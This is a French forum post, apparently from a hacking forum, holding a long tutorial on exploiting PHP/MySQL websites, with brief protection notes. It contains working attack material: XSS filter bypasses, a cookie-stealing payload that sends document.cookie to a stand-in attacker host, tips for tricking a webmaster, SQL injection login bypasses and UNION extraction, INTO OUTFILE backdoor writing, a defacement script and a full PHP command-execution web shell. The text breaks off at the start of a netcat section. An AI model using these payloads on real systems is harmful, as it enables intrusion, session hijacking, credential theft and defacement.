Annonce

Réduire
Aucune annonce.

De nombreuses failles web ...

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • De nombreuses failles web ...

    Ce tutoriel est complet ( donc long et pour les intéressés ).

    Les failles étant en abondance, je ne m'attarderais que sur les plus connues.

    Le tutoriel se déroulera comme ceci :

    - Explication théorique d'une faille
    - Exploitation de la faille
    - Protection de la faille

    Le serveur de test est un serveur Apache (php 5.0.4) – MYSQL (4.1.12) tournant sur Win2000 Server.
    Directives php spéciales: register_global ON, magic_quotes ON, display_errors ON E_ALL, file_uploads ON,
    safe_mode OFF.

    Pour commencer, il ne faut pas forcément être un acharné du php/mysql pour suivre ce tuto, mais quelques notions sont quand même requises (xhtml, javascript, bien évidement PHP et SQL, et batch).

    Table des matières

    0. Introduction
    1. Récupérer des infos
    2. Filtres
    3. Forcer les variables
    4. XSS
    4.1. non-permanent
    2. permanent
    5. Injection SQL
    5.1. Injection de base (avec magic_quote off)
    5.2. Utilisation des commentaires
    5.3. UNION
5.4. OUTFILE
5.5. UPDATE
    5.6. LIMIT magic_quote on
    5.7. NULL Authentification
    6. Include
    6.1. Include à distance
    6.2. Les backdoor shell
    6.3. Netcat
    6.4. Backdoor permanente
    6.5. Include local et .htaccess
    6.6. Les fichiers des clients ftp
    6.7. NULL Byte
    7. Upload
    7.1. Double extension
    7.2. Bypass mime vérification
    7.3. Sélection du répertoire de destination
    8. CSRF
    9. Les Sessions
    9.1. Prédiction
9.2. Capture
9.3. Fixation
9.4. Directory Listing
    10. Conclusion


    0. Introduction.

    Les services de forums, livre d'or, espace admin ... utilisent des scripts dans des langages évolués qui s'exécutent du côté serveur (languages interpretés). C'est-à-dire que, contrairement aux javascripts qui sont côté client, ces derniers s'exécutent sur le site que vous visitez. Vous ne recevez jamais que le résultat en html lorsque vous visitez une page php, asp, cgi... C'est pour ça qu'on ne peut pas lire la source php (sinon ce serait trop facile).

    Les failles php s'exploitent sur des erreurs de programmation due à l'inattention ou la méconnaissance du programmeur mais également dans certaines fonctions PHP. Beaucoup de webmasters vont coder leurs scripts, les tester et s'ils fonctionnent, ne se soucieront pas des risques qu'ils peuvent prendre. Par exemple, en ne filtrant pas les variables car la plupart des failles viennent du fait qu'elles ne sont pas filtrées (ou pas correctement).

    Durant tout le tuto nous nous servirons des erreurs éventuelles renvoyées par l'interpréteur PHP (à savoir que celle-
    ci ne sont pas forcement affichées, voir directive display_error dans le php.ini).

    1. Récupérer des infos.

    Avant de directement nous lancer sur une cible, il est important d'analyser au maximum celle-ci.
    
Par exemple la version php utilisée, la version apache, les configurations du serveur...
    
Déjà récupérer l'ip du serveur.


    Code:
    ping -a victime.com


    On récupère l'ip (216.239.59.104).

    Des infos sur le serveur apache :


    Code:
    telnet >> open victime.com 80

    
Ensuite taper :


    Code:
    HEAD \index.php HTTP 1.1

    puis 2 fois Enter.


    Voilà, on a la version apache qui tourne sur un serveur Windows, et on a également la version de PHP. (A savoir que ces informations ne sont pas forcément dévoilées).

    Grâce au phpinfo, on peut déjà savoir si certaines directives sont activées ou non (comme les magic_quotes, l'upload de fichier, register_globals...).
    Ces renseignements sont enregistrés dans le php.ini. Une version consultable peut être visualisée suivant les hébergeurs (ou forcer l'affichage par <?php php info(); ?> ).

    Une info qui serait pas mal, ce serait de déterminer le chemin du répertoire web sur le serveur.
    
On peut provoquer des erreurs pour faire afficher le path en modifiant des variables.
    
Exemple (pris au hasard sur internet) :


    Code:
    Warning: imagejpeg(): Unable to open 'files/thumbs/tse.jpg' for writing in /data/members/free/fr/f/o/r/votreforum/htdocs/attach_mod/includes/functions_thumbs.php on line 203

    Et bien on en sait désormais un peu plus sur l'arborescence du serveur. Cette "faille" s'appelle la "Faille path disclosure".

    Et les failles, où les chercher ? Et bien, déjà, visionnez les sources du site, on y trouve beaucoup d'infos (les hiddens,
    les posts, les url, les cookies...) qui nous mettrons sur une voie afin de savoir quelle faille tester.

    2) Les filtres.

    Le but d'un filtre va être de filtrer la variable. Généralement, ils vont convertir leurs entrées par leurs équivalents ascii et interdire ou modifier certaines de celle-ci par mesure de sécurité.
    
Il existe différents types de filtres :

    a) Les fonctions PHP :

    Il existe plusieurs fonctions qui filtrent les variables, les plus connues sont: html entities(), htmlspecialchars(), addslashes(), strip_tags()...

    Ces fonctions ne peuvent pas être bypassées, mais heureusement pour nous et malheureusement pour les webmasters, la fonction str_replace() peut l'être.

    Imaginons le code suivant:


    Code PHP:
    $var=str_replace("<script>","",$var);          //Ceci est une fausse sécurité 

    La fonction str_ replace() est "case sensitive", (sensible à la casse).
    
Donc si on envoie:


    Code PHP:
    <script>alert("hack")</script > 

    le str_replace() ne servira a rien.

    
On peut également envoyer :


    Code PHP:
    <sc<script>ript>alert("hack")</sc<script>ript

    Le str_replace() va effacer le mot <script> ce qui nous donnera: <script>alert("hack")</script> ce qui bypass encore la protection.

    Autre cas:


    Code PHP:
    $var=str_replace("<script>","<script>",$var);            //plus proche de la réalité 

    Ici le caractère interdit va être remplacé par son équivalant html. Mais on peut bypasser ça si on envoie :


    Code PHP:
    <script/*<script>*/>alert("hack")</script> 

    (attention à ne pas couper le mot SCRIPT, mettez les commentaires directement avant ou après les < >)
    
<script> va être remplacé, mais on l'a mit en commentaire.
    
Ce qui donne:<script/*<script>* / >alert("hack")</script>.

    Protection:


    Code PHP:
    $Hackademy=str_replace("<","<",$Hackademy);
    $Hackademy =str_replace(">",">",$Hackademy); 

    Dans ce cas, on ne saurait pas échapper au remplacement des caractères < et > par leurs équivalents html. Mais le mieux et le plus sûr est d'utiliser les fonction php comme htmlentities() ou encore htmlspecialchars().

    b) Le filtre javascript :

    Certains webmasters créent leurs filtres en javascript. Ils testent leurs filtres, et en effet ils fonctionnent comme ils le souhaitent. Seulement voilà, on peut très bien recréer le formulaire sur notre machine en enlevant la vérification du javascript (ou tout simplement en désactivant le javascript dans le web browser).

    Protection:

    Le javascript doit être banni pour la vérification des entrées. Rien ne vous empêche de faire une petite alerte pour prévenir l'utilisateur pour une meilleure convivialité mais en aucun cas ne faites les vérifications avec les du javascript.


    c) La configurations du php.ini :


    Certaines configurations peuvent (théoriquement) bloquer/sécuriser certaines entrées.

    ●magic_quotes : remplacera les quotes dans les requêtes envoyées par des \'
●display_errors : affichera les erreurs dans les scripts 
●file_uploads : permettra l'upload de fichier sur le serveur
●safe_mode : est le mode de sécurité de PHP (plus d'info : [Vous devez être inscrit et connecté pour voir ce lien] ).
    ●register_globals : acceptera toute créations de variable en get ou post.
    ●...


    d) Les différents codages :

    Tous les caractères peuvent s'écrire avec des codages différents et suivant certains filtres, certains codages passent,
    et d'autre non. Voici les codages les plus couramment utilisés :

    Encoding Type Encoded Variant of '<'

    URL Encoding %3C
    HTML Entity 1 &lt;
    HTML Entity 2 &lt
    HTML Entity 3 &LT;
    HTML Entity 4 &LT
    Decimal Encoding 1 <
    Decimal Encoding 2 <
    Decimal Encoding 3 <
    Hex Encoding 1 <
    Hex Encoding 2 <
    Hex Encoding 3 <
    Unicode 16#16u003c

    Note: Voici un site avec d'innombrables parades pour tromper les filtres

    3. Faille URL

    Explication :

    Nous allons commencer par la faille la plus simple, qui nous servira pendant tout ce tuto.

    En fait, PHP utilise des variables qui peuvent lui être transmise en GET ou en POST ou grâce aux cookies.

    Suivant les directives dans le php.ini, "register_global" est à on ou off. Si elle est a "On", cela signifie qu'on peut
    fournir à un script autant de variable que l'on veut (et même qu'il n'utilise pas).
    
En GET, il suffit de les déclarer dans l'appel du script.
    
Exemple:

    http://www.xxx.com/monscript.php?var1=Hackademy&var2=4

    
PHP va donc déclarer et assigner ces 2 variables.

    
Et voici comment elles sont récupérées:


    Code PHP:
    $varintermediaire=$_GET['var1']; 

    EN POST, comme sont nom l'indique, c'est lorsqu'on post (submit) des variables depuis un formulaire.
    
<form action="monscript.php" method="POST">
<input type="hidden" name="var1" value="Hackademy">
<input type="hidden" name="var2" value="4">
<input type="submit" value="Envoyer">
</form>

    Dans certain cas, l'utilisation des POST sont inévitables, car le script PHP récupère la valeur de cette manière :


    Code PHP:
    $varintermediaire=$_POST['var1']; 

    Voilà maintenant que nous savons comment sont transmises les variables, et comment peut-on forcer leurs déclarations ainsi que
    leurs affections, nous allons pouvoir commencer…

    Exploitation :

    On imagine le script suivant :


    Code PHP:
    <?php
if($droits=="admin")
{
    echo "PANNEL ADMIN";
    }else
    {
    echo "PANNEL USER";
    }?>

    On suppose que la variable $droits reçoit la valeur admin lorsque celui-ci c'est correctement authentifié.

    
Lorsqu'on ce promène sur le site, on voit dans la barre d'adresse :

    http://www.xxx.com/monscript.php?droits=user

    
Et si on force la variable droits à admin ?

    http://www.xxx.com/monscript.php?droits=admin

    
Et nous voila dans le panel admin, dur n'est-ce pas ?

    Pour les post, si l'on souhaite modifier des variables, nous allons devoir recréer le formulaire sur notre machine, mais il faudra modifier l'attribut action dans le <form> étant donné que l'url du script est une url relative.

    
Ce qui nous donne :



    Code PHP:
    <form action="http://www.xxx.com/paneladmin.php" method="POST">&#8232;<input type="hidden" name="droits" value="user">
<input type="submit" value="Envoyer">
</form> 

    
Comme vous vous en serez douté, on va changer la valeur de la variable droits par admin.

    Ces 2 techniques sont la base de l'exploitation des failles. Il est fort rare de trouver des failles de ce genre.

    Protection :

    Le plus simple est de mettre "register_global" à "Off". Dans certain cas, l'initialisation de la variable à NULL ou 0 peut boucher une potentielle faille. Dans le cas des POST, il est très difficile d'être certain que le formulaire est bien du site, même en vérifiant le referrer, car celui-ci peut également être falsifié en modifiant les requêtes mais nous y reviendrons plus tard.

    4. Les XSS.

    Explication:

    XSS (Cross Site Scripting) permet l'injection de code html-javaScript dans un script PHP, en exploitant des variables mal protégées.

    4.1 Xss non-permanente.

    Commençons avec une faille très simple.

    Non-permanent signifie que le code malicieux mis dans la variable n'est pas enregistrée dans une BDD ni dans un fichier.
    
Imaginons un script PHP tout simple:

    Inscription à un espace membre.

    
Si on entre par exemple un e-mail non-conforme, on obtient :

    http://www.xxx.com/index.php?page=in...+est+incorrect

    Nous allons voir si les variables sont filtrées. Pour ça, on envoie un code html ou javascript.
    
http://www.xxx.com/index.php?page=inscription&error=<b>Bonjour</b>
    
Si le script nous affiche <b>Bonjour</b>, c'est que la variable est filtrée sinon il affichera Bonjour en gras.

    Admettons que la variable n'est pas filtrée.

    On pourrait déjà afficher une alert :

    http://www.xxx.com/index.php?page=in...39;)</script>.

    Ce qui nous affichera une petite alerte.

    Certains éléments du vbscript peuvent en effet être exécutés grâce à un CSS.

    
Essayez par exemple :

    http://www.xxx.com/index.php?page=in...ript"</script>

    4.2 La XSS permanente.

    Cette faille existe aussi dans les formulaires (pour enregistrer un message dans un livre d'or par exemple).

    Il suffit donc de mettre le code javascript dans un des champs que le script php affiche (ex: le message).

    Dans ce cas la XSS sera permanente car le code que l'on aura tapé sera enregistré dans la BDD et s'affichera à
    chaque fois qu'on appellera la page.

    Exploitation :

    Une alerte javascript c'est bien beau, mais ça ennuie tout le monde et ça n'a aucun intérêt pour nous. Cette faille
    peut être bien plus dangereuse que ça. Beaucoup de webmail en ont fait les frais (MSN, Yahoo!, ...).
    Les failles XSS permettent d'exécuter tous les codes javascript, et entre autre celui qui affiche le cookie et même se le faire envoyer ou les stocker.

    On va donc combiner la faille XSS avec la faille cookie qui a pour but de récupérer le cookie d'un utilisateur.

    Pour ceux qui ne saurait pas ce qu'est un cookie, c'est un petit .txt qui contient des informations (variables) de l'utilisateur. Un cookie a une durée de vie déterminée et une taille fixée a 4ko maximum.

    Beaucoup de forums stockent leurs pass dans des cookies en crypté, voire en clair (rarement).

    Vous dites au webmaster de se rendre sur son livre d'or en lui donnant l'url modifiée car il y a une erreur (encodez
    l'url que vous lui donnerez car sinon il risque de comprendre la supercherie) et paf, vous avez son cookie.

    Pour récupérer le cookie, il faudra rediriger la victime sur une page PHP qui enregistrera ou enverra par mail le cookie.


    Code PHP:
    <img src="xxx.jpg" onerror="window.location='http://www.pirate.com/recup.php?cookie='+document·cookie;"

    Ce code html combiné avec du javascript redirige le visiteur si l'image n'existe pas.

    On a donc la valeur du cookie dans la variable cookie maintenant on fait ce qu'on veut avec.

    Que mettre sur la page recup.php ?

    Il faut récupérer la valeur de la variable cookie et l'enregistrer dans un .txt ou vous l'envoyer par mail (je ne donne pas ces codes, il existe assez de sites qui explique comment faire). Mais comme je suis gentil, je vous donne une astuce pour que le webmaster ne se rende pas compte du hack, car comme nous l'avons vu, le script ouvre une page automatiquement.

    Cette technique est tout à fait invisible et très courte dans la source de la page.

    Il suffit de mettre une iframe.


    Code PHP:
    <IFRAME SRC="http://votresite/redirect.htm" width="0" height="0"></IFRAME

    (légèrement visible sous Firefox car l'iframe prend par défaut une taille de 1*1)

    Sur la page redirect.htm, vous mettez un javascript pour rediriger la victime sur recup.php?cookie=document·cookie

    
Nous avons enfin récupéré le cookie !

    
Qu'en faire?

    S'il ressemble à ça :

    login=admin;password=Hackademy

    C'est facile, on a tout de suite compris que le login est "admin" et le mot de passe "Hackademy".

    Il suffit donc se connecter au site victime avec ces identifiants. (Bien sûr, nous n'aurons l'accès admin que si nous avons chopé le cookie d'un admin).

    
Si le cookie est crypté, on peut quand même l'utiliser !

    
Cookie récupéré :

    sessid=ze541dfgfd5g4dfgdg1df2gffdgdf5g4dfg;login=sdf4564sdfdf2

    
On a donc nos 2 variables : le sessid (pour les sessions, on en reparlera plus tard) et le login.

    
Il ne suffit plus que de reconstituer ce cookie sur notre ordinateur !

    
Voici comment faire : on ouvre notre navigateur, et on tape dans la barre d'adresse :


    Code:
    javascript:alert(document·cookie="sessid=ze541dfgfd5g4dfgdg1df2gffdgdf5g4dfg;login=sdf4564sdfdf2")

    puis, "Enter"

    Et voilà ! il suffit d'aller sur le site victime, et nous serons automatiquement connecté !

    Vous pouvez également utiliser un programme qui injectera le cookie dans la page genre Hkit ou Cookie Explorer.

    Petite complication:

    On imagine le script suivant:


    Code PHP:
    <?php echo '<input type="text" name="pseudo" value="'.$pseudo.'">'?>

    Si on essaie d'afficher le cookie en envoyant :


    Code PHP:
    $pseudo=<script>alert(document·cookie);</script> 

    On obtient comme ligne :


    Code PHP:
    <input type="text" name="pseudo" value="<script>alert(document·cookie)</script>"

    Ce qui n'affiche pas le code javascript dans le input.

    Pour afficher le cookie, on doit fermer l'attribut value=" : donc on injecte plutôt :


    Code PHP:
    $pseudo="><script>alert(document·cookie);</script> 


    Ce qui nous donne:


    Code PHP:
    <input type="text" name="Hackademy" value=""><script>alert(document·cookie)</script>"> 

    Protection:

    Rien de bien compliqué, il suffit de filtrer les variables avec la fonction htmlspecialchars(). Cette fonction va remplacer <, >, &, ' et " par leur équivalant html.


    Code PHP:
    $variable=htmlspecialchars($variable); 

    5. Injection SQL

    Explication :

    Lorsqu'une page PHP communique avec la base de donnée pour afficher, ajouter, modifier, supprimer une donnée, une/plusieurs requête(s) SQL est/sont construites et est/sont envoyée(s) à la BDD. Le but de l'injection SQL va être de modifier la requête afin d'accéder au compte admin, d'afficher le login et le pass, enregistrer un membre avec les droits admin, etc.

    
La requête va être modifiée grâce à des valeurs non filtrées entrées par l'attaquant.

    
A savoir que nous ne connaissons pas l'architecture de la base de donnée, ni la requête qui est envoyée.

    
Ce qu'il faudrait c'est provoquer des erreurs pour espérer que le mysql_error() nous dévoile le nom des tables et un bout de la requête envoyée.

    Nous traiterons 2 types d'injections avec un "sélect", l'une, nécessitant que les magic_quotes du php.ini soient désactivées, l'autre, plus dangereuse, fonctionnera sur tous types de configurations.

    Le but sera le même : récupérer les login et passwords ou bypasser l'identification.

    La 3eme injection portera sur l'update où le but sera de modifier un pass admin ou encore modifier les droits d'un user.

    5.1 Injection sql de base :

    Nous allons simuler une attaque, c'est-à-dire comme si nous n'avions pas le code PHP sous les yeux.

    Le script de test est : injectionsql.php

    Pour vérifier la présence de la faille, on va injecter dans login'login et dans pass"pass ; si on obtient un message d'erreur, c'est que les quotes ( ' ou " ) passent sans être bloquées.

    Citation:
    "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' and pass='"pass'' at line 1"

    Les magic_quotes sont désactivées et on obtient un bout de la requête !

    On va construire une requête qui permettra de nous connecter sans avoir le login, ni le pass.

    Requête de base:


    Code PHP:
    $sql="select * from admin where login='$login' and pass='$pass'"

    Il faudrait qu'on puisse vérifier la condition pour accéder à l'espace admin :


    Code PHP:
    $req="select * from admin where login='' OR 'X'='X' and pass='' OR 'X'='X' "

    En français : il sélectionne tout les champs de la table admin où le login est NULL OU 'X'='X' (condition toujours vérifiée) ET le login est NULL OU 'X'='X'

    Il faut donc insérer ce login :


    Code:
    ' OR 'X'='X

    et la même chose pour le pass.

    La syntaxe de la requête est correcte, et le résultat est celui qu'on voulait obtenir car nous sommes désormais admin !

    Voici quelques expressions toujours vérifiée :


    Code PHP:
    SELECT FROM table WHERE 1=1&#8232;SELECT * FROM table WHERE 'X'='X'
SELECT * FROM table WHERE NULL IS NULL
… 

    5.2 Utilisation des commentaires :

    
Maintenant je vais vous montrer encore d'autres requêtes qu'on pourrait injecter grâce aux commentaires (du PHP et du SQL).

    L'utilisation des commentaires est très importante pour pouvoir "effacer" ce qui se trouve derrière la dernière variable entrée.

    LOGIN: Hackademy'/*
    PASS: */OR 'X' = 'X


    Code PHP:
    $req="select * from admin where login='Hackademy'/*' and pass='*/OR 'X'='X' "

    /* en php signifie commentaire et ce ferme par */

    Analyse :

    De cette façon, on doit connaitre le login (pratique pour accéder à un compte choisi)

    Note: On n'est pas obligé de fermer le commentaire par */, on peut donc mettre ce qu'on veut dans le champs "pas".

    LOGIN: Hackademy'#
    PASS: ce qu'on veut (mais pas vide)


    Code PHP:
    $req="select * from admin where login='Hackademy'#' and pass='' "

    # signifie que tout ce qui se trouve après # sera en commentaire pour mysql.

    Avec Microsoft SQL Server se sera --

    5.3 UNION.

    Maintenant imaginons que l'on souhaite afficher le contenu d'un champs quelque soit la table.
    
Nous savons, que lorsqu'on entre dans l'espace admin, il affiche le login de l'admin.
    
On pourrait par exemple modifier la requête pour qu'au lieu d'afficher le login, il affiche le pass.

    Dans ce cas, il va falloir utiliser la clause UNION qui permet de joindre dans le mysql_query(); une deuxième sélection, comme celle de login et pass de la table admin.

    Mais attention, la clause UNION ne s'applique que pour des tables Union-compatibles, c'est-à-dire des tables ayant le même nombre de champs et des champs de même types (int, varchar...).

    En gros, voici une UNION :


    Code PHP:
    $sql="select login,pass from admin where login='' UNION SELECT login,pass from admin/*' and pass='$pass' "

    Il faut déterminer le nombre de champs du premier select, pour cela on se sert de l'erreur renvoyée :


    Code PHP:
    ' UNION SELECT 0 from admin/*=> Erreur SQL : The used SELECT statements have a different number of columns 

    ' UNION SELECT 0,0 from admin/*=> On rentre dans l'espace admin et on obtient Bonjour l'admin 0

    =>Nous savons désormais que la table admin contient 2 champs.

    Pour ne pas risquer d'avoir un problème de type, on envoi 0 qui retournera systématiquement 0.

    Ainsi vous testerez la position du champs souhaité (en supposant que le champs contenant les pass s'appelle pass). Il ne faut pas chercher midi à quatorze heure, le nom du champs contenant le pass est généralement passwd, pass, password, passwd, motdepasse, mot_de_passe, mdp ...


    Code PHP:
    ' UNION SELECT 0,pass from admin/* => On dirait que c'est la requête de base.
    ' UNION SELECT pass,0 from admin/* => On récupère comme pass: HACKADEMY. 

    Login= admin et pass= Hackademy

    5.4 OUTFILE.

    Mais cette faille est encore bien plus puissante, il est possible d'exporter la liste de résultat du select.

    La fonction INTO OUTFILE écrira (par défaut) dans le dossier lib\mysql\nomdelatable le fichier contenant la sortie du select.

    (Attention à bien replacer le fichier dans le répertoire www, sans quoi vous ne pourrez le consulter)

    Il faut également les droits des fichiers.

    Exemple:


    Code PHP:
    $sql="select login,pass from admin INTO OUTFILE 'path/file.txt' "

    Imaginons un login contenant ' OR 'X'='X' INTO OUTFILE '../../www/file.txt'#

    Ce qui donne comme requête :


    Code PHP:
    $sql="select login,pass from admin where login='' OR 'X'='X' INTO OUTFILE '../../www/file.txt'#' and pass='$pass'"

    On n'a pas le bon pass, mais maintenant on va à la racine du serveur rechercher le fichier file.txt :

    admin Hackademy
    admin1 The Hackademy

    Voici ce que le select a sorti : on a directement le login et le pass !

    Mais on peut aller encore bien plus loin...

    Imaginons qu'un des champs du select soit un code PHP, et que l'on sorte les résultats du select dans file.php !!!

    Pour effectuer cette action, il faudra de nouveau faire une UNION, forcer la valeur d'un champs, et sortir le résultat du select.

    
login: ' UNION SELECT "<?php @include($var);?>","0" from admin INTO OUTFILE '../../www/file.php'#

    
Le code php sera enregistré dans file.php, il nous suffira de le consulter et de modifier $var par une backdoor.

    Attention, n'oubliez pas que le type doit être compatible, donc mettez bien le code php dans un champs de type texte.

    5.5. UPDATE.

    L'update, comme son nom l'indique, permet de modifier une donnée dans un champs.

    
Il serait assez sympathique de modifier nos droits d'accès à certaines sous-parties d'un forum, ou encore modifier le pass d'un des admins par le notre.

    
Le script de test est : injectionsql2.php

    On vérifie la présence de la faille.

    login='"login, pass='"pass et email='"email.

    Si vous obtenez ceci :

    Citation:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'email' where login='Hackademy'' at line 1

    C'est quartier libre !

    Grâce à ça nous savons que la requête se termine par where login="Hackademy". (Hackademy car nous somme dans l'administration de notre profil (généralement c'est en fonction de l'id).

    Ce qu'il faudrait c'est modifier la requête pour changer le where login="Hackademy" en where login="admin".

    Pour ça rien de plus facile !

    Imaginons d'abord la requête qui pourrait se trouver derrière (pour déduire les noms de variables, regardez le nom des <input> car c'est souvent les même)


    Code PHP:
    $req="update latable set mdp='$mdp',email='$email' where login='Hackademy'"

    Pour modifier le pass de l'admin, voici la requête à faire :


    Code PHP:
    $req="update latable set mdp='notrepass',email='' where login='admin'# ' where 

    login='Hackademy'";

    Ce qui donne :


    Code:
    mdp=nouveaupass
email= ' where login='admin'#

    Et voilà !

    Maintenant pour nous mettre admin. Attention dans ce cas, il va falloir connaitre le nom du champs (accès, droits, user_level, level…).


    Code PHP:
    $req="update latable set mdp='$mdp',email='',acces='5' where login='Hackademy'"

    Ce qui donne :


    Code:
    mdp=nouveaupass
email=',acces='5

    5.6 LIMIT magic_quote on

    Dans la partie précédente, nous avons eu recours au caractère quote ' ou ". Ces derniers sont très souvent "backslashé" c'est à dire que PHP les transforme (grâce au magic_quotes activées) en \" ou \', ce qui le rend inoffensif, et sans ce caractère, l'injection est impossible !

    Regardez un peu le script injectionsql3.php

    D'après nos connaissances personnelles en SQL, on sait que $debut est la première variable de la clause LIMIT, qui est sous la forme :


    Code PHP:
    $sql="Select * from membre LIMIT$ de but,$fin"

    Cette clause LIMIT ne nécessite aucunes quotes pour délimiter les limites. L'exploitation est strictement la même.

    $fin est souvent calculé suivant le nombre de messages afficher par page ($fin=$debut+$nbrmessagesparpages).

    Donc pour peu que la variable $debut ne soit pas filtrée, on peut faire afficher ce qu'on veut.

    Imaginons une requête pour qu'on puisse récupérer le login et le pass.

    On ne connait pas le nombre de champs. Donc nous ferons les test habituelles.

    Composons la requête avec UNION :


    Code PHP:
    $sql="select * from messages limit 0,150 UNION SELECT login,pass,0,0,0,0,0,0 FROM admin/*,$fin"

    Pour avoir le login


    Code PHP:
    debut=0,150 UNION SELECT 0,login,pass,0,0,0,0,0 FROM admin /* 

    Il suffit ensuite d'aller voir les derniers messages. On obtient : Pseudo: Hackademy et Hackademyb4by.

    
Et maintenant, on affiche le pass :

    
On décale l'affichage d'un champs :


    Code PHP:
    0,150 UNION SELECT login,pass,0,0,0,0,0,0 FROM admin /* 

    On obtient Pseudo: admin et Hackademy.

    Et voila, on a obtenu ce qu'on cherchait.

    Cette injection n'utilise aucunes quotes, et sera donc utilisable sur n'importe quelle configuration.

    Protection:

    Pour les 2 premiers cas, vous vous rappelez que l'exploitation n'est possible que si les magic_quotes sont désactivées, on va donc créer une petite fonction qui va vérifier si les magic_quotes sont activées ou non dans la configuration PHP, et si elles ne le sont pas, on va appliquer addslashes() sur la variable.


    Code PHP:
    function secur($var)
    {&
    #8232;if(get_magic_quotes_gpc()==0)
{
    $var=addslashes($var);
    }&
    #8232;return($var);
} 

    Pour le second cas, l'utilisation de addslashes ne sécurise nullement la variable, vu que l'on n'utilise pas de quotes !

    Mais, on sait que la variable $debut ne contient normalement que des valeurs numérique, on peut donc imaginer :

    
La fonction intval() indique que la variable ne peut contenir que des valeurs numérique, le cas échéant, elle attribue
automatiquement la valeur 0, ce qui nous simplifie encore les choses.
    
Pour sécuriser notre script, il faut donc sécuriser le champs de cette façon :


    Code PHP:
    $debut=intval($debut); 

    5.7. NULL Authentification.

    Vous vous demandez certainement ce que signifie cette faille ! Et bien tout simplement, sur certains scripts PHP, qui ne contrôle pas si les champs login/password sont NULL, l'authentification peut être bypassée !
    
Une requête du type :


    Code PHP:
    SELECT From user WHERE login="$loginAND password="$password
    
renverra


    Code PHP:
    Select from login="" AND password="" 

    Et cette requête renvoi une valeur positive !
    
Comme quoi, il ne faut pas négliger le contrôle des champs vides, la fonction empty() est la pour sa !

    6. La faille include :

    Explication :

    La faille include vient de la fonction include() de php qui permet d'exécuter du php d'une autre page page php. Elle permet également d'inclure des pages html, ou du texte.

    L'include la plus connue est au début de la plupart des pages php avec connexion à une BDDL.


    Code PHP:
    include("config.php");          // config.php contient les variables avec les renseignements de connexion à la BDD. 

    Il faut avant tout savoir que la faille include est très très dangereuse, car avec une backdoor, on peut faire n'importe quoi... (éditer, supprimer, uploader, changer les chmod…).

    Il existe 2 types d'include:

    L'include à distance et l'include locale.

    6.1. Include à distance

    C'est la plus souvent rencontrée mais également la plus facile à exploiter.

    Imaginons un script de pseudo-frame :


    Code PHP:
    <?php
    if(!empty($page))
    @include (
    $page);
    else
    include (
    "accueil.html");
    ?>

    Ici si la $page contient une valeur, il l'inclus sinon il inclus la page d'accueil.
    
Et c'est là qu'est la faille car on peut y inclure n'importe quoi.
    
Il suffit de mettre sur un script dans un .txt sur un hébergeur, on inclut cette page, et le script s'exécute.
    
exemple: http://www.victime.com/index.php?pag...e/backdoor.txt

    En supposant ce code dans backdoor.txt :


    Code PHP:
    <?php
$fp=fopen("index.php",w+);
fwrite("Owned by S4K4R0V",$fp);
fclose($fp);
?>

    De cette façon l'index.php va être effacé et on va y écrire un petit message.

    Maintenant si on remplace la ligne :


    Code PHP:
    @include ($page); 

    par


    Code PHP:
    @include ($page.".php"); 

    La page appelée recevra l'extension .php ce qui implique une petite contrainte qu'il faut absolument respecter.

    On appelle la page : [Vous devez être inscrit et connecté pour voir ce lien] =

    De cette façon, la page qui va être incluse sera backdoor.txt?var =.php ce qui ne génèrera pas l'exécution du code de la backdoor.

    6.2. Les shell backdoor.

    Pour pouvoir exploiter plus rapidement l'include, certain ont codé des backdoor en php qu'il suffit d'inclure.

    Certaines vont même jusqu'à l'utilisation d'un shell si l'hébergeur le permet.

    Ceci permet d'exécuter des commandes qui sont celle de windows ou de linux suivant l'O.S. de l'hébergeur.
    
Imaginons qu'on ait un site qui accepte les shells.
    
On a une backdoor (shellessai.php) qui permet d'envoyer des commandes :


    Code PHP:
    <?php
if(empty($shell))
{
    echo'
    <table align="center" border="0" bgcolor="#cccccc">
    <tr>
<form method="post">
<td><img border="0" src="/icons/comp.gray.gif" alt="[CMD]"></td>
<td><input type="text" name="shell" value="'.$shell.'"></td>
<td><input type="submit" name="submit" value="Shell"></td>
<td></td>
</form>
</tr>
    </table>
    ';
    }else
    {
$shell = stripslashes($shell);
if ($cmd = `$shell`)      //Exécute la cmd
{
    echo '<br><pre>'.$shell.'</pre>';
    echo '<br><pre>'.htmlentities($cmd).'</pre>';
    }
    }?>


    Pour les shells, vous avez plusieurs fonctions possibles :

    ●exec()
    
●system()

    ●passthru()

    ●` `

    ●...


    On envoie un dir et un ls pour tester quel est l'O.S. du système.

    Dans ce cas, c'est dir qui nous liste les répertoires, donc il s'agit d'un système sous windows.

    Le volume dans le lecteur W s'appelle SITE.

    Le numero de série du volume est 4411-DADB.

    Répertoire de W:\var\www\hack\shell

    16/04/2006 21:41 <REP> .
    16/04/2006 21:41 <REP> ..
    15/02/2006 02:50 38ÿ268 Id.php
    15/02/2006 01:56 23 include.php
    15/02/2006 01:51 1ÿ918 infos serveur.php

    3 fichier(s)
    51266 octets
    2 Rep(s)
    2111072 octets libres

    Maintenant on va créer un fichier batch pour l'exécuter par la suite.

    
SHELL>> echo mkdir Hackademy >>cmd.bat


    On fait un dir pour s'assurer qu'on a bien créé le cmd.bat

    16/04/2006 21:41 <REP> .
    16/04/2006 21:41 <REP> ..
    15/02/2006 14:50 123 cmd.bat
    15/02/2006 02:50 38ÿ268 Id.php
    15/02/2006 01:56 23 include.php
    15/02/2006 01:51 1ÿ918 infos serveur.php

    Il y est bien, maintenant on l'exécute.

    
SHELL>>cmd.bat

    
On refait un dir.

    16/04/2006 22:15 <REP> Hackademy

    C'est bon on a bien crée notre nouveau dossier "Hackademy".

    Pour ce qui est des commandes, en voici les seules intéressantes:

    HELP nom_cmd ou nom_cmd /?

    Et oui, inutile de faire un cours sur le DOS, vous trouverez toutes les infos nécessaires grâce à la commande help.

    Elle vous donnera tout les attributs que peuvent prendre les commandes.

    Astuce : Certaines commandes sont interdites, pour les utiliser, vous devrez d'abord créer un bat contenant les commandes à exécuter (comme certain accès à regedit).

    6.3. Netcat

    Je tenais aussi à vous montrer un petit utilitaire ayant plein de fonctionnalités, dont celle d'ouvrir un shell. Ce petit utilitaire s'appelle netcat. Je ne vous expliquerai pas toutes les possibilités que propose ce programme mais juste celle qui nous intéresse, c'est-à-dire l'obtention d'un shell.

    Tout d'abord, il faut réussir à uploader nc.exe et le faire exécuter. Pour cela on peut prendre un script d'upload (upload.php) et le script shellessai.php.

